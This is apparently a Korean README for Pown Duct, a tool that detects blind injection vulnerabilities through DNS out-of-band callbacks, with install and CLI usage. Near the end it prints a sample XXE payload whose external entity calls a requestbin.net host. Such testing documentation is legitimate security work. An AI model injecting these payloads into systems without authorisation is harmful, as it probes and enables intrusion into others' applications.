
블라인드 인젝션 공격을 찾기 위한 필수 도구.
블라인드 인젝션 공격을 DNS 사이드 채널을 통해 탐지하는 필수 도구.
이 도구는 secapps.com 오픈소스 이니셔티브의 일부입니다.
___ ___ ___ _ ___ ___ ___
/ __| __/ __| /_\ | _ \ _ \/ __|
\__ \ _| (__ / _ \| _/ _/\__ \
|___/___\___/_/ \_\_| |_| |___/
https://secapps.com
참고: 이 도구는 http://requestbin.net 서비스를 활용합니다. 향후 버전에서는 전용 맞춤형 인프라를 사용할 예정입니다.
이 도구는 Pown.js의 일부로 사용되도록 설계되었지만, 독립적인 도구로도 따로 실행할 수 있습니다.
평소처럼 먼저 Pown을 설치하세요:
$ npm install -g pown@latest
Pown에서 직접 호출:
$ pown duct
또는 프로젝트 루트에 이 모듈을 로컬로 설치:
$ npm install @pown/duct --save
설치 후 pown cli 호출:
$ ./node_modules/.bin/pown-cli duct
또는 글로벌 pown을 사용하여 로컬 도구를 호출할 수도 있습니다:
$ POWN_ROOT=. pown duct
pown duct <command>
사이드 채널 공격 활성화 도구
Commands:
pown duct dns DNS 덕팅
Options:
--version 버전 표시 [boolean]
--help 도움말 표시 [boolean]
pown duct dnspown duct dns
DNS 덕팅
Options:
--version 버전 표시 [boolean]
--help 도움말 표시 [boolean]
--channel 채널 복원 [string]
--output 출력 형식 [string] [choices: "string", "hexdump", "json"] [default: "string"]
SQL 인젝션, XSS, XXE, SSRF와 같은 공격을 수행해야 할 때가 있지만, 대상 애플리케이션이 취약함을 전혀 나타내지 않는 경우가 있습니다. 취약점이 존재하는지 확인하는 한 가지 방법은 DNS 해석기가 제어하는 도메인을 조회하도록 강제하는 유효한 공격 벡터를 삽입하는 것입니다. 해석이 성공하면 공격이 성공한 것으로 간주됩니다.
참고: 아마도 고객에게 유사한 서비스를 제공하는 Burp Collaborator에 익숙하실 것입니다.
먼저, 사용 가능한 일회용 DNS 이름이 필요합니다:
$ pown duct dns
스크린샷
제공된 DNS를 사용하여 페이로드를 구성하세요. 예를 들어, 다음 코드는 XXE 취약점이 존재할 경우 DNS 해석을 트리거할 수 있습니다.
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY bar SYSTEM "http://showmethemoney.bfa8b8d3c25f09d5429f.d.requestbin.net">
]>
<foo>
&bar;
</foo>
공격이 성공하면 터미널에 메시지가 표시됩니다.
스크린샷